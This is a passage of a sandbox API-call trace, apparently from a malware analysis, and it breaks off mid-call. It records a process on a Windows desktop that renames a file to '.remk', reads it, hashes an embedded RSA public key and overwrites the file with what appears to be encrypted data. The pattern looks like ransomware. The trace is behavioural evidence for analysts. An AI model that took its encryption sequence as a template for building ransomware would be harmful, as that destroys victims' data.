0x37ba600 [0233.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0233.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.051] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\-RvZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\-rvz.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\-RvZ.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\-rvz.flv.remk")) returned 1 [0233.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.052] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0233.053] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91349080, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0x7173f270, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7173f270, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x7f15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4jworgauj.bmp", cAlternateFileName="4JWORG~1.BMP")) returned 1 [0233.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0233.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.053] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\4jworgauj.bmp") returned=".bmp" [0233.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\4jworgauj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0wlw97nt\\4jworgauj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.058] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=32533) returned 1 [0233.058] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.061] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7eef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.061] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.063] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.063] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x7f15, lpOverlapped=0x0) returned 1 [0233.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.064] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0233.065] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.065] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.065] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.065] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.065] GetLastError () returned 0x0 [0233.065] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.066] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0233.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.066] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.066] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.066] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7f20) returned 0x37c2278 [0233.066] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb4f8 [0233.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb540 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2e0 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.067] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0233.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee328 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee310 [0233.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.068] GetCurrentThreadId () returned 0x314 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b97d0 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.069] GetCurrentThreadId () returned 0x314 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0233.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0233.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee388 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee3a0 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee340 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0233.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb540 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0233.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.074] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x7f10, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x7f10, lpOverlapped=0x0) returned 1 [0233.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0233.074] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7f15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.074] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 